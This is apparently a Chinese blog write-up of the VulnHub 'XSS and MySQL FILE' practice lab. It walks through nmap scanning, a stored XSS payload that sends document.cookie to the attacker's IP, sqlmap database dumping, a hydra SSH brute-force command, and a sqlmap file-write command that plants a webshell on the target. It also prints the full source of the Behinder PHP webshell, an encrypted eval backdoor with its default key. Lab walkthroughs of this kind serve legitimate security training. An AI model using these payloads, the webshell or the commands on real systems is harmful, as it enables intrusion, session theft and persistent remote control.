vulnhub:xss_and_mysql_file

xss存储型漏洞使用方式 mysql漏洞sqlmap工具使用

下载地址:Pentester Lab: XSS and MySQL FILE ~ VulnHub

在kali上都有

  1. sqlmap
  2. nmap
  3. dirbuster
  4. hydra
  5. msfconsole

复现过程

打开靶机

  1. 信息收集
    用nmap扫描
    -A 全信息扫面
    -sS 版本探测
  2. 打开网页
    监听80端口 ,将下面代码ip换成自己kali的地址
     

  3.  
    <script>new Image().src="http://192.168.139.130/test.php?output="+document.cookie;</script>





     


  4. 使用sqlmap进行dump数据库   

  5. 使用冰歇shell 
    或者换成菜刀的一句话木马 网上有
    <?php
    @error_reporting(0);
    session_start();
        $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    	$_SESSION['k']=$key;
    	session_write_close();
    	$post=file_get_contents("php://input");
    	if(!extension_loaded('openssl'))
    	{
    		$t="base64_"."decode";
    		$post=$t($post."");
    		
    		for($i=0;$i<strlen($post);$i++) {
        			 $post[$i] = $post[$i]^$key[$i+1&15]; 
        			}
    	}
    	else
    	{
    		$post=openssl_decrypt($post, "AES128", $key);
    	}
        $arr=explode('|',$post);
        $func=$arr[0];
        $params=$arr[1];
    	class C{public function __invoke($p) {eval($p."");}}
        @call_user_func(new C(),$params);
    ?>
    
  6. 写入到css路径下
    sqlmap -u "http://192.168.139.130/admin/edit.php?id=1" --cookie=PHPSESSID=换成自己的 --file-write="上面冰歇本地文档路径" --file-dest="/var/www/css/shell.php" 写入目标主机路径

    使用冰蝎进行链接




  7.  

  8.   msfconsole 和上面的配置一样  给我连 联系的方式啊 在这里面没啥用
  9. 最后还是用hydra 九头蛇爆破过的
hydra -t 10 -l user -P /usr/share/wordlists/dirb/common.txt 192.168.139.130 ssh

sudo -l 查看能使用的命令

 这个百度贼全

Kali—Dirbuster工具用法 - 简书 (jianshu.com)

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值